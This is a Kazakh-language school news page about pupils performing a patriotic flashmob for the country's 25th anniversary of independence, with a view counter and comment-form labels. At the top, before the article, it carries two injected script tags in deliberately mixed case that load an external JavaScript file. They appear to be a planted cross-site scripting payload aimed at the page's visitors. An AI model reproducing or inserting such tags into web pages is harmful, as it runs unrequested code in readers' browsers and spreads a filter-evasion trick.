<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

26.10.2018

Еліміздің 25 жыл тәуелсідігіне орай Ғ.Әбдірахманұлы атындағы мектебінде 10 желтоқсан күні 5-8 сынып оқушылары патриоттық флешмоб биледі. Негізгі мақсаты: оқушылар бойында өз еліне, жеріне деген сүйспеншіліктерін арттыру, патриоттық сезімдерін жандандыру.

Біздің ертеңгі болашағымыз жастардың қолында. Сондықтан да, жастарымызды осы таңнан бойларына патриоттық сезім, рухани байлығы мол, адамгершілігі шексіз, қазақ тілін еркін меңгерген, елдің тарихын, мәдениетін, өнерін, салт-дәстүрін жақсы білетін, оны әрі қарай дамытып, сақтай алатын азамат пен азаматшалар тәрбиелеу біздің міндетіміз.

Жастарымыз оқуда, еңбекте және спортта өжет те қайсар болса, еліміз одан әрі өркендеп, гүлденіп түсетіні анық. Мемлекеттік рәміздерді құрметтеуге, дәріптеуге дайын, ата-анасын қадірлей алатын, үлкенге құрмет, кішіге ізет көрсететін, білімге табандылықпен ұмтылатын, салауатты өмір салтын ұстанатын, табиғатын аялай алтанын және Отанға шексіз қызмет етуге дайын болатындай жастарымыз болса, ол біздер үшін үлкен мәртебе.

Просмотров: 855


Пікір қосу



Деректерді қолтаңбаға қосу